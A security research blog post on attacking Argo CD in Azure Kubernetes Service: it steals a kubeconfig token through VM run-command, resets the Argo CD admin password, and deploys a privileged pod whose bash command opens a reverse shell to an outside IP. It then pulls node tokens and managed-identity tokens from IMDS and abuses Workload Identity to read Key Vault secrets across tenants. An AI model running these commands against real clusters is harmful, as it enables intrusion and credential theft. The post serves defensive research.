
From ArgoCD To Azure Hybrid Attacks

In the ever-changing DevOps and cloud-native applications landscape, continuous delivery tools have become essential for managing deployments at scale. Among these tools, Argo CD has become a popular choice for Kubernetes-native continuous delivery. But as we all know, with great power comes great responsibility, and the security implications of such powerful tools cannot be overlooked.

While ArgoCD streamlines the deployment process and ensures consistency across environments, its default configuration and privileged access patterns can potentially create security vulnerabilities that malicious actors might exploit. This blog post looks at the critical security considerations surrounding ArgoCD deployments, particularly focusing on privilege escalation risks and potential attack vectors in Azure Kubernetes Service (AKS) environments.

Through practical demonstrations and real-world scenarios, we’ll explore how seemingly innocent misconfigurations or compromised credentials can lead to serious security breaches, allowing attackers to gain unauthorized cluster access, manipulate deployments, and potentially access sensitive cloud resources. Understanding these security implications is crucial for organizations implementing ArgoCD in their production environments.

What is ArgoCD?

ArgoCD is a declarative continuous delivery tool for Kubernetes. It runs as a controller that continuously monitors running applications and compares their current state against the desired target state, reconciling the cluster to deliver the required resources.

Excessive Permissions?

By default, when deploying Argo CD to a Kubernetes cluster, some of its containers are deployed with a privileged service account attached and cluster-level permissions. If these are compromised, an attacker can gain complete control over the cluster, access cloud identity credentials, and move laterally to different environments.
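A quick way to see this for yourself (a sketch; the resource names assume the default cluster-scoped Argo CD install manifest in the "argocd" namespace):

# List the bindings that reference Argo CD service accounts
kubectl get clusterrolebindings,rolebindings -A -o wide | grep -i argocd

# Inspect the ClusterRole bound to the application controller's service account
kubectl describe clusterrole argocd-application-controller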

What Are We Going to Demonstrate?

The attacks we are going to present are based on the assumption of a compromised cloud identity (in our case, a compromised user account) and its permissions in the RBAC (Role-Based Access Control) of Azure Resource Manager (ARM) and in the Kubernetes RBAC of local accounts on AKS (Azure Kubernetes Service). We will show how to access the admin interface of Argo CD and escalate our privileges within the Kubernetes cluster with a different approach from those available online today.

The flow of the attack in a specific Azure environment:

  • Execute commands on a VM using Azure RBAC permissions.
  • Steal a Kubernetes service account token from the workstation (from <USER HOME PATH>\.kube\config).
  • Abuse the AKS cluster's enabled local accounts with Kubernetes RBAC.
  • Modify Argo CD Kubernetes secrets via Kubernetes RBAC permissions, using a Kubernetes identity that has permission to "patch"/"update" a specific Argo CD secret.
  • Use the modified Argo CD secret to deploy a privileged pod and escape the container to the hosting Node.
  • Access cloud IAM credentials from the hosting Node.

First demo settings:

Azure Cloud Service: Azure Kubernetes Service (AKS)

Kubernetes version: 1.28.9

Kubernetes cluster accessibility (private/public): Public cluster

Kubernetes Authentication and Authorization method: Local account with Kubernetes RBAC

Argocd application — Accessible via a Kubernetes Service of type “LoadBalancer” in the Kubernetes cluster (this is not a pre-condition for the attack).

Argocd default admin: enabled.

Argocd built-in login access: enabled.

Node OS image — AKSUbuntu-2204gen2containerd-202407.29.0

Steps of Exploitation:

Step 1: Azure Resource Manager — Run Command on VM

Assuming the attacker successfully obtained valid Microsoft Entra ID (formerly Azure AD) credentials:

  • Application credentials (secret, certificate, ADFS).
  • Managed identities — system assigned, user assigned.
  • User credentials.

Now, the attacker can use Azure Resource Manager (ARM) permissions ("Microsoft.Compute/virtualMachines/runCommand/action") to access resources in the attacked organization's subscription.

The user account is allowed to run OS commands on the following Virtual Machine:


Step 2: Steal the Kubernetes Authentication Credentials from the VM’s .kube/config file

az vm run-command invoke -g <resource group> -n <name of the machine> --command-id RunShellScript --scripts "cat /home/<username>/.kube/config | grep token:"


The OS command is executed to extract the service account token used for authentication.

Step 3: Use the Service Account Token via Environment Variable to Authenticate to the Kubernetes Cluster

az vm run-command invoke -g <resource group> -n <name of the machine> --command-id RunShellScript --scripts "export KUBECONFIG=/home/<username>/.kube/config && kubectl get pods -n argocd"


The output for listing pods in the argocd namespace using the az vm run command.

Step 4: Enumerate and List Current Roles and Access to our Service Account

Kubernetes RBAC explanation:

ClusterRoles and Roles are Kubernetes entities representing RBAC rule bundles to be applied to Kubernetes identities (subject) upon a scope in the cluster. ClusterRoles can be bound to a specific namespace (RoleBinding) or the entire cluster scope (ClusterRoleBinding), and Roles can be bound to a namespace scope only (RoleBinding).

Roles and ClusterRoles are composed of an array of rules, each having the following properties:

  • apiGroups: an array containing the API groups that the relevant resources belong to.
  • resources: an array containing the resource types the rule applies to.
  • resourceNames (optional): an array of resource names that narrows down which resources are affected by the rule.
  • verbs: an array of the allowed types of access on the resource(s), e.g. "get", "delete", "create", "update" and more.

In summary, ClusterRoles are used for cluster-wide access control and permissions, while Roles are used for defining permissions at the namespace level.
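For illustration, a minimal Role combining these properties could look like the following (a hypothetical manifest, not one taken from the demo environment):

cat <<'EOF' | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: example-secret-patcher          # hypothetical Role name
  namespace: argocd
rules:
- apiGroups: [""]                        # "" denotes the core API group
  resources: ["secrets"]
  resourceNames: ["argocd-secret"]
  verbs: ["get", "list", "patch"]
EOF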

So, now that we better understand how Kubernetes RBAC works, let's enumerate the "argohelper" Kubernetes service account (which we compromised in steps 2-3) and its permissions within the cluster.
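Assuming the stolen kubeconfig from step 3 is in use, a sketch of the enumeration (which of these calls succeed depends entirely on the token's own RBAC grants; "kubectl auth can-i --list" always reflects the caller's rights):

# Effective permissions of the current identity, cluster-wide and in "argocd"
kubectl auth can-i --list
kubectl auth can-i --list -n argocd

# RBAC objects in the "argocd" namespace and any ClusterRoleBindings mentioning "argohelper"
kubectl get serviceaccounts,roles,rolebindings -n argocd
kubectl get clusterrolebindings -o wide | grep argohelper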


 Listing Kubernetes namespaces — “argocd” namespace


Listing all the service accounts from the “argocd” namespace.


Listing RoleBinding Kubernetes resources in the "argocd" namespace; as can be seen, the "argohelper" Kubernetes service account is a subject in the RoleBinding "patch-secret-binding", which binds the "patch-secret-role" Kubernetes Role.


The "patch-secret-role" Role in the "argocd" namespace allows "list" and "patch" on the secret "argocd-secret" in the same namespace.


The ClusterRole bindings of the cluster with focus on “argohelper-bind” which binds the Kubernetes service account “argohelper” with the “pod-listing-role” ClusterRole.


The "pod-listing-role" ClusterRole, which allows "list" and "get" on Kubernetes pods at cluster scope.

To summarize, the permissions of the service account “argohelper” enable the following:

  • Permission to “patch” and “update” the “argocd-secret” Kubernetes secret in the “argocd” namespace.
  • Permission to “get” and “list” all pods in the cluster scope.

Step 5: Enumerate the Current Argocd Containers and Their Service Accounts

According to the Argo CD documentation, to obtain or rotate the admin password you can take either of two actions:

  • List Argo CD's initial admin password from the "argocd-initial-admin-secret" Kubernetes secret in the "argocd" namespace (Kubernetes secret values are stored base64 encoded). If it hasn't been changed yet, you can log in to the admin panel using that decoded password.

  • If the first secret no longer works because the password has already been changed, but you can modify the "argocd-secret" Kubernetes secret in the "argocd" namespace (via the "patch" or "update" verbs), you can reset the admin password to an arbitrary value, as sketched after this list. The password value is hashed with the bcrypt algorithm, so permission merely to discover it (e.g., via the "list" or "get" verbs) is insufficient to determine the admin password.
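A minimal sketch of both options from the CLI (assuming kubectl access with sufficient permissions, and that the htpasswd utility from apache2-utils is available to produce a bcrypt hash for the later patch):

# Option 1: read and decode the initial admin password, if the secret still exists
kubectl -n argocd get secret argocd-initial-admin-secret -o jsonpath='{.data.password}' | base64 -d; echo

# Option 2: prepare a bcrypt hash of a password of our choice for the patch in step 6
# (the sed converts the $2y$ prefix produced by htpasswd to the $2a$ variant Argo CD expects)
htpasswd -nbBC 10 "" 'password123' | tr -d ':\n' | sed 's/$2y/$2a/'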


Listing Kubernetes secrets in the “argocd” namespace.


Getting the current base64 encoded value of the "argocd-initial-admin-secret" Kubernetes secret in the "argocd" namespace.


Getting the current bcrypt-hashed values of the "argocd-secret" Kubernetes secret in the "argocd" namespace.


Kubernetes service accounts in the “argocd” namespace


Let’s list and observe the RoleBindings that are relevant to the above-mentioned Kubernetes service accounts.

I’d like to focus your attention specifically on the following Kubernetes Roles, at the “argocd” namespace:

  • “argocd-application-controller”
  • “argocd-applicationset-controller”

Looking at the two Role definitions, which belong to two of the Kubernetes service accounts running when Argo CD is deployed, we can see that "argocd-application-controller" has permissions equivalent to the built-in "cluster-admin" ClusterRole.



Enumerating the pods on the argocd namespace


Getting the pod “argocd-application-controller-0” from namespace “argocd”, including its “metadata.uid”

Step 6: Patch the “argocd-secret” Secret to Get into the Admin Panel

Since the Kubernetes service account we control, "argohelper", has permission to "patch" the "argocd-secret" secret in the "argocd" namespace, we can patch it with a bcrypt-hashed, base64-encoded password value of our choice:


Patching the Kubernetes secret to the base64 encoded, bcrypt hashed value of the password — “password123”
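For reference, a sketch of the equivalent kubectl patch (field names follow the admin-password layout of "argocd-secret" described in the Argo CD FAQ; the hash is the one produced earlier):

kubectl -n argocd patch secret argocd-secret \
  -p '{"stringData": {
        "admin.password": "<BCRYPT HASH OF password123>",
        "admin.passwordMtime": "'"$(date +%FT%T%Z)"'"
      }}'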

We still need to determine the Argo CD configurations, for example:

  • Admin user enabled: true/false
  • Default authentication or SSO authentication.

The above configurations are set in the “argocd-cm” Kubernetes configMap, in the ArgoCD namespace:


Getting the “argocd-cm” Kubernetes configMap from “argocd” namespace. The fact that there is no “data” property in the file indicates that this is a default installation of Argo CD.

By default, the admin user is enabled and is not represented in the "argocd-cm" ConfigMap. To determine whether the admin user has been disabled, look for the following property in the "argocd-cm" ConfigMap (a quick check is sketched after this list):

  • "admin.enabled" with the value "false"
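A quick check (a sketch; an empty result means the key is absent, so the admin user is enabled by default):

# Prints "false" only if the admin user was explicitly disabled
kubectl -n argocd get configmap argocd-cm -o jsonpath='{.data.admin\.enabled}'; echo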

In addition, the "argocd-cm" ConfigMap can define the following Argo CD settings:

  • Enabling/disabling local user accounts
  • Argo CD RBAC based on roles
  • The type of authentication: built-in or SSO
  • Whether accounts may create API keys (account capabilities)


Accessing the Argo CD admin panel via the Kubernetes service of type LoadBalancer that made it accessible

Step 7: Creating a Privileged Pod Using an “Argo CD Application”

First, the attacker logs in to the Argo CD admin panel (steps 5 and 6), goes to the "Applications" page, and then clicks the "+ NEW APP" button:


Set the Argo CD Application resource with the source of a remote CI/CD repository (e.g. GitHub) in your control. It should contain a reference to a Deployment that will create instances of a privileged pod.


Definition of the above-mentioned Argo CD Application, containing a “spec.source.repoURL” directive with URL to a CI/CD repository in your control.
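For illustration, an equivalent Application manifest could look roughly like the following (the application name, repository URL, and path are hypothetical placeholders for an attacker-controlled repository; the same definition can also be entered through the "+ NEW APP" form):

cat <<'EOF' | kubectl apply -f -
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: innocent-app                   # arbitrary application name
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/<attacker>/<repo>.git   # attacker-controlled repository
    targetRevision: HEAD
    path: manifests                     # directory holding the privileged workload manifest
  destination:
    server: https://kubernetes.default.svc
    namespace: default
  syncPolicy:
    automated: {}                       # deploy as soon as the repository content changes
EOF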


 The YAML definition of the malicious privileged pod we control from our GitHub repository (in our example)

Once our privileged pod has been run, it performs the following:

  • An Ubuntu OS container runs a bash command that opens a reverse shell to another instance under our control, listening on TCP port 7777; in our case, the IP address "4.242.16.43" belongs to a Virtual Machine with a public IPv4 address (see the manifest sketched below).
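A sketch of the kind of manifest that could live in that repository (names are illustrative; the IP address and port match the listener described above, and the host namespaces plus the hostPath mount are what enable the escape in the next step):

apiVersion: v1
kind: Pod
metadata:
  name: priv-pod                 # illustrative name
spec:
  hostNetwork: true              # share the Node's network namespace
  hostPID: true                  # share the Node's process namespace
  hostIPC: true                  # share the Node's IPC namespace
  containers:
  - name: shell
    image: ubuntu:22.04
    command: ["bash", "-c", "bash -i >& /dev/tcp/4.242.16.43/7777 0>&1"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host           # the Node's root filesystem, used later with chroot
  volumes:
  - name: host-root
    hostPath:
      path: /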


In Kubernetes, the pod specification settings "hostNetwork", "hostPID", and "hostIPC" take either "true" or "false" values and control sharing of the host's network, process, and IPC namespaces; they are well explained and elaborated in the article "Bad Pods: Kubernetes Pod Privilege Escalation" by Bishop Fox.

While the Argo CD Application is being built and deployed, the pod is scheduled and run as well. It then opens a TCP reverse shell connection to our user-controlled machine (a Virtual Machine in our case), where a netcat service is listening:


 Receiving the reverse shell connection from the Kubernetes VMSS instance that acts as the Kubernetes Node, to our controlled machine’s listening netcat service on port 7777


"Chrooting" into the "/host" path, which is a hostPath Kubernetes volume mounted with the path to the host's root filesystem. The "chroot /host" command in this case lets you operate directly on the host's root filesystem.

From this point, you can directly access the privileged Kubernetes service account "argocd-application-controller" in the "argocd" namespace.


Using our reverse shell to the host’s file system to list pods and their containers, whilst focusing on “argocd-application-controller” pod container and enumerating its UID

From this point, we can compromise associated resources of the pods that are scheduled on the same Node. For example, in our case it's possible to access the pod's mounted projected volume that contains its attached Kubernetes service account token.


Exposing the pod’s mounted service account token from the host’s file system
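From the host shell (after chroot /host), the projected token can typically be found under the kubelet's pod directory; a sketch, where <POD UID> is the metadata.uid of "argocd-application-controller-0" enumerated earlier:

ls /var/lib/kubelet/pods/<POD UID>/volumes/kubernetes.io~projected/
cat /var/lib/kubelet/pods/<POD UID>/volumes/kubernetes.io~projected/kube-api-access-*/token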


Demonstrating that the JWT (JSON Web Token) we obtained belongs to the "argocd-application-controller" service account

After setting the service account token as our client credential, the "kubectl auth can-i --list" command outputs our compromised service account's permissions within the cluster scope, privileges that are equivalent to the "cluster-admin" ClusterRole.

Authenticating with a token of the service account “argocd-application-controller”:


Resetting the client credentials to use a service account token:

kubectl config set-credentials argocd-application-controller --token=<k8s service account token>


Using the following kubectl command to reset the service account user credential in our current context:

kubectl config set-context --current --user=argocd-application-controller

In addition to compromising the pod's attached Kubernetes resources, there is another vector we can leverage in cloud environments: stealing the Node's Azure Managed Identity via IMDS (the Instance Metadata Service), in order to move laterally and possibly gain more privileges within the Azure environment.

But what happens if you can’t create a privileged pod due to an admission control policy in place to prevent you from deploying an “escapeable” Pod?

In fact, you don't have to break out of the container to access the cloud provider's IMDS. With the pod's `hostNetwork` setting set to `true`, you essentially share the Node's network interface and can reach the IMDS without needing to escape your newly deployed pod:
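From inside such a pod, the Node's managed identity token can be requested directly from the Azure Instance Metadata Service endpoint (the endpoint, header, and API version below are the standard Azure IMDS values; the requested resource here is the ARM REST API):

curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"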


Reverse shell with the unprivileged pod.


Root on the container level (not the node level).


The token of the managed identity that has permissions on the Azure Resource Manager (ARM) REST API.

Azure Kubernetes Workload Identity:

Kubernetes workloads deployed on Azure Kubernetes Services (AKS) clusters sometimes require having Microsoft Entra Identities with adequate permissions to access Microsoft Entra-protected resources, such as Azure Key Vault (Azure Resource Manager), etc.

There are multiple authentication and authorization options available on AKS clusters that enable "hybrid" identity permissions across environments, essentially allowing Kubernetes service accounts to assume Azure principals and their derivative permissions. The newest and most recommended feature of this kind is Microsoft Entra Workload ID for AKS, supported in AKS clusters since version 1.22. It utilizes the cluster's defined OpenID Connect (OIDC) issuer to authenticate and authorize Kubernetes service accounts to Microsoft Entra ID resources, rather than relying on a static authentication credential saved as a Kubernetes Secret. In this scenario, we'll demonstrate access to Azure Key Vault secrets.

The following steps are required to enable the Workload Identity feature for an AKS cluster:

  1. Enable Entra Workload ID for the AKS cluster, either by updating its "securityProfile" or by recreating it, e.g. updating an existing AKS cluster:
  • Enable Entra Workload ID for an existing cluster:
    az aks update -g <RESOURCE GROUP> -n <CLUSTER> --enable-oidc-issuer --enable-workload-identity
  • Determine the OIDC server's URL:
    az aks show -g <RESOURCE GROUP> -n <CLUSTER> --query "oidcIssuerProfile.issuerUrl"
  • Determine whether Entra Workload ID is enabled (returns 'true' if it is):
    az aks show -g <RESOURCE GROUP> -n <CLUSTER> --query "securityProfile.workloadIdentity.enabled"
  2. Create or use an existing User-Assigned Managed Identity or Entra ID Application that will have the federated credentials defined:
  • E.g., create a new User-Assigned Managed Identity:
    az identity create -n <IDENTITY> -g <RESOURCE GROUP> -l <LOCATION>
  • E.g., create an Application: az ad sp create --id <APPLICATION ID>
  3. Create a Federated credential for the dedicated User-Assigned Managed Identity / Entra ID Application that uses the cluster's "oidcIssuerProfile.issuerUrl" OIDC server, matches the dedicated Kubernetes Service Account in a specific Kubernetes namespace (created in step 4), and has the audience "api://AzureADTokenExchange". This can be done via the CLI using the following commands:
  • For an Azure User-Assigned Managed Identity:

az identity federated-credential create --name <NAME> --identity-name <MANAGED IDENTITY NAME> --resource-group <RESOURCE GROUP> --issuer <OIDC SERVER> --subject system:serviceaccount:"<NAMESPACE>":"<SA NAME>" --audience <AUDIENCE>

  • For an Azure Application:

az ad app federated-credential create --name <NAME> --id <APPLICATION ID> --resource-group <RESOURCE GROUP> --issuer <OIDC SERVER> --subject system:serviceaccount:"<NAMESPACE>":"<SA NAME>" --audience <AUDIENCE>

  4. Create a Kubernetes Service Account that is assigned to the Federated credential of the Azure Principal, and annotate it with the following (a manifest sketch follows this list):
  • azure.workload.identity/client-id: <TARGET AZURE PRINCIPAL CLIENT ID>
  • azure.workload.identity/tenant-id: <TARGET AZURE TENANT ID> (optional)
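A minimal sketch of step 4 (hypothetical names; note that, with current versions of the feature, pods that should receive the federated token must also carry the azure.workload.identity/use: "true" label so the mutating webhook injects the projected token and the AZURE_* environment variables):

cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: ServiceAccount
metadata:
  name: workload-sa                        # hypothetical service account name
  namespace: default
  annotations:
    azure.workload.identity/client-id: "<TARGET AZURE PRINCIPAL CLIENT ID>"
    azure.workload.identity/tenant-id: "<TARGET AZURE TENANT ID>"   # optional
---
apiVersion: v1
kind: Pod
metadata:
  name: workload-pod
  namespace: default
  labels:
    azure.workload.identity/use: "true"    # required for token and env var injection
spec:
  serviceAccountName: workload-sa
  containers:
  - name: cli
    image: mcr.microsoft.com/azure-cli
    command: ["sleep", "infinity"]
EOF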

Several Kubernetes service account and pod annotations and labels can help you configure and harden the Microsoft Entra Workload ID feature's overall security in your cluster.

The full list of available labels and annotations that can be used to configure the token-exchange behavior is documented on the Azure AD Workload Identity site (azure.github.io).

In an adequately configured AKS environment, the Kubernetes service account token is automatically mounted into any Pod that uses that service account, based on the service account's annotations, and authentication requests are validated; the credential "conversion" process is elaborated in the diagram below:

[Diagram: the credential conversion process]
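Inside a pod configured this way, the webhook injects the AZURE_CLIENT_ID, AZURE_TENANT_ID, AZURE_FEDERATED_TOKEN_FILE, and AZURE_AUTHORITY_HOST environment variables along with the projected Kubernetes token; a sketch of exchanging that token for an Entra ID token with the Azure CLI:

az login --service-principal \
  --username "$AZURE_CLIENT_ID" \
  --tenant "$AZURE_TENANT_ID" \
  --federated-token "$(cat "$AZURE_FEDERATED_TOKEN_FILE")"
az account get-access-token --resource https://management.azure.com/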

Microsoft Entra Workload ID supports the following mappings related to a Kubernetes service account:

  • “One-to-one”, where a service account references a Microsoft Entra object.
  • “Many-to-one”, where multiple service accounts reference the same Microsoft Entra object.
  • “One-to-many”, where a service account references multiple Microsoft Entra objects by changing the Client ID annotation.

Attack Scenarios

Cross-tenant lateral movement

In either mapping case, it's possible to set the mapped identity to one that resides in a different Azure tenant than the cluster itself, using the azure.workload.identity/tenant-id annotation elaborated above, set to the UUID of the tenant where the mapped Azure Principal exists.
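If the attacker can modify the service account, repointing it at a principal in another tenant is a one-line change (a sketch with placeholder values):

kubectl -n default annotate serviceaccount default \
  azure.workload.identity/client-id=<REMOTE PRINCIPAL CLIENT ID> \
  azure.workload.identity/tenant-id=<REMOTE TENANT UUID> \
  --overwrite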

For example:

The Azure user "ilz@xmresearchtest.onmicrosoft.com" is currently authenticated and has permissions to our AKS cluster "xmcyber-optimized" in the tenant "XM Cyber Research." It is bound to the "cluster-admin" Kubernetes ClusterRole and can execute commands in the Pod "default" in the "default" namespace, which has the Azure Workload Identity credentials mounted on it.


On the remote tenant ("ModelSubscription"), we created a Service Principal named "melech-external" and added a Federated credential ("external-federated-aks") configured with the "XM Cyber Research" tenant's OIDC server URL (the one defined on our "xmcyber-optimized" AKS cluster), along with the Kubernetes service account "default" in namespace "default".


Using the mounted Federated credentials on our Pod, we are now authenticated to the "ModelSubscription" Azure tenant as the Service Principal "melech-external". It is assigned the "Azure Kubernetes Service Cluster User Role" and "Azure Kubernetes Service RBAC Reader" Azure Resource Manager RBAC roles, which enable it to access most of the remote tenant's AKS resources in the permitted scope, including the "aks_cluster_scenario_tester" AKS cluster.



Our Service Principal “melech-external” and the Azure RBAC Roles it’s assigned to.




Retrieving the appropriate kubeconfig settings using the Az SDK, converting the authentication credential format to match this specific scenario using Azure Workload Identity, and finally listing resources that reside in the remote "aks_cluster_scenario_tester" AKS cluster
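A sketch of that step using the standard CLI tooling instead of the Az SDK (kubelogin's "workloadidentity" login mode consumes the AZURE_* variables injected into the pod):

az aks get-credentials -g <REMOTE RESOURCE GROUP> -n aks_cluster_scenario_tester
kubelogin convert-kubeconfig -l workloadidentity
kubectl get pods -A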

This feature may enable an attacker to compromise multiple Azure principals with permissions over multiple Azure tenants.

“One-to-Many” for Lateral Movement

As a result of how this feature operates, as long as there are multiple Federated Credential mappings for Azure Service Principals / User-Assigned Managed Identities, an attacker who can either modify a Kubernetes service account's annotations to point at a different Azure Service Principal Client ID, or create a new Kubernetes service account with the adequate annotations, can change the mapped Azure Principal to another one in order to move laterally and assume other Azure principals that have more or different permissions.


The Kubernetes permissions required to modify a service account this way are the "update" or "patch" verbs over "serviceaccounts" resources in the "core" API group (the default when the API group field is empty). Alternatively, for Microsoft Entra ID authentication with Azure RBAC in AKS, an Azure principal needs the "Microsoft.ContainerService/managedClusters/serviceaccounts/write" dataAction assigned to it over the relevant AKS cluster scopes.

Also, to compromise Microsoft Entra ID principals that don't have pre-existing federation credential mappings, the following attack vectors are possible:

  • If the attackers also have the Azure Resource Manager RBAC permission "Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write" over Azure User-Assigned Managed Identities, they can compromise those identities by mapping them to a Kubernetes service account they control.
  • If the attackers also have the Microsoft Entra directory RBAC permission "microsoft.directory/applications/credentials/update" over an Azure Application, they can compromise its app registration by mapping it to a Kubernetes service account they control.

An attacker with one of the permissions mentioned above can compromise the Azure principals in the permission’s scope.

When the abovementioned scenario is possible, an attacker can use the various 'azure.workload.identity' annotations, setting the desired Azure service principal and matching tenant UUIDs. For example:

The following scenario continues the previous multi-tenant scenario, in which the mapped Azure Principal has Azure Resource Manager permissions over AKS clusters; in this scenario, there is another Microsoft Entra ID Application with other Azure Resource Manager RBAC permissions:


Entra ID Application “Caesar-dev” is assigned to the Azure Resource Manager Role “Key Vault Secrets User” that enables it to read Azure Key Vault Secrets data


Entra ID Application "Caesar-dev" is assigned the Microsoft Entra ID role "Application Administrator", which among other things enables it to create Application Federated Credentials


Using melech-external's "Application Administrator" role, we could add new Federated credentials to the Entra ID Application "Caesar-dev", assigned to the "poc" Kubernetes service account in namespace "default", for the previous AKS cluster, "xmcyber-optimized"


 On the AKS cluster — “xmcyber-optimized”, we can now create a Kubernetes service account “poc” at namespace “default” that assumes the remote “Caesar-dev” app registration Federated Credential


On the AKS cluster "xmcyber-optimized", we can now create a Kubernetes pod "poc-pod" in namespace "default" that utilizes the "poc" Kubernetes service account, which assumes the remote "Caesar-dev" app registration's Federated Credential. Using the assumed remote app registration, we could leverage "Caesar-dev"'s assigned "Key Vault Secrets User" Azure Resource Manager role to read secrets of the "dev-top-secret" Azure Key Vault; in this example we obtained the "top-secret" Secret.
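From inside "poc-pod", after authenticating with the injected federated token (as in the az login sketch earlier), reading the secret is a single call (a sketch using the names from this example):

az keyvault secret show --vault-name dev-top-secret --name top-secret --query value -o tsv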

To sum up, attackers who have compromised an AKS Pod in an AKS cluster that supports Microsoft Entra ID for AKS may be able to abuse this feature and move laterally and/or vertically to Azure environments and principals they contain, given other permissions they may attain during their attack orchestration.

 

The post From ArgoCD To Azure Hybrid Attacks appeared first on XM Cyber.

